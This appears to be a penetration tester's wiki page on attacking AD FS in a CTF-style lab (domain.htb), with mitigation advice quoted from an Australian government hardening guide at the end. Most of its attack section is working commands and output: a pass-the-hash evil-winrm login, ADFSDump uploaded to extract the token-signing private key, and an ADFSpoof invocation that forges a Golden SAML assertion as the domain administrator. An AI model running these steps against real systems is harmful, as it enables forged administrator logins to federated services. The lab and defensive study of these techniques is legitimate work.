AD FS

ADFSDump

LogoGitHub - mandiant/ADFSDumpGitHub

Precompiled:

https://github.com/0xSs0rZ/ADFSDump/raw/refs/heads/main/ADFSDump.exe
# evil-winrm -u 'adfs_gmsa$'  -H '3<-SNIP->07a' -i 10.10.11.24
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload ADFSDump.exe
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Uploading /workspace/ADFSDump.exe to C:\Users\adfs_gmsa$\Documents\ADFSDump.exe
                                        
Data: 40276 bytes of 40276 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> .\ADFSDump.exe
    ___    ____  ___________ ____
   /   |  / __ \/ ____/ ___// __ \__  ______ ___  ____
  / /| | / / / / /_   \__ \/ / / / / / / __ `__ \/ __ \
 / ___ |/ /_/ / __/  ___/ / /_/ / /_/ / / / / / / /_/ /
/_/  |_/_____/_/    /____/_____/\__,_/_/ /_/ /_/ .___/
                                              /_/
Created by @doughsec


## Extracting Private Key from Active Directory Store
[-] Domain is domain.htb
[-] Private Key: FA-DB-3A-06-<-SNIP->21-29-61-CB-21-C7

<-SNIP->

ADFSpoof

LogoGitHub - mandiant/ADFSpoofGitHub

Golden SAML

LogoGolden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud AppsCyberArk
LogoGolden SAML AttackNetwrix
LogoActive Directory - Federation Services - Internal All The Things

  1. Dump info with ADFSDump

  2. Save the private key to file with appropriate format

echo '8D-AC-A4-90<-SNIP->-58-FB-9D-A1' | tr -d '-' | xxd -r -p > private_key.bin

  1. Save the Encrypted signing token with hex format

cat token.enc | base64 -d > token.bin

  1. Golden SAML

 python ADFSpoof.py -b ../token.bin ../private_key.bin -s core.domain.htb saml2 --endpoint https://core.domain.htb:8443/adfs/saml/postResponse --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'DOMAIN\administrator' --rpidentifier https://core.domain.htb:8443 --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>DOMAIN\administrator</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'

Mitigation

The following security controls should be implemented to mitigate a Golden SAML:

  • Ensure the AD FS service account is a gMSA. This minimises the likelihood of the account being compromised via other techniques, such as Kerberoasting or DCSync.

  • Ensure the AD FS service account is used only for AD FS and no other purpose. By using the AD FS service account only for AD FS, and no other purpose, it reduces its attack surface by not exposing its credentials to other systems.

  • Ensure passwords for AD FS server local administrator accounts are long (30-character minimum), unique, unpredictable and managed. Microsoft’s Local Administrator Password Solution (LAPS) can be used to achieve this for local administrator accounts. Local administrator accounts can be targeted by malicious actors to gain access to AD FS servers. For this reason, these accounts need to be protected from compromise.

  • Limit access to AD FS servers to only privileged users that require access. This may be a smaller subset of privileged users than the Domain Admins security group. This reduces the number of opportunities for malicious actors to gain access to AD FS servers.

  • Restrict privileged access pathways to AD FS servers to jump servers and secure admin workstations using only the ports and services that are required. AD FS servers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

  • Only use AD FS servers for AD FS and ensure no other non-security-related services or applications are installed. This reduces the attack surface of AD FS servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD FS server.

  • Centrally log and analyse AD FS server logs in a timely manner to identify malicious activity. If malicious actors gain privileged access to AD FS servers, this activity should be identified as soon as possible to respond and limit the impact.

  • Encrypt and securely store backups of AD FS servers and limit access to only Backup Administrators. Backups of AD FS servers need to be afforded the same security as the actual AD FS servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD FS servers.

  • Rotate AD FS token-signing and encryption certificates every 12 months, or sooner if an AD FS server has been compromised or suspected to have been compromised. Both certificates need to be rotated twice in rapid succession to revoke all existing AD FS tokens.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

PreviousMDTNextTrustee and Resource Delegation

Last updated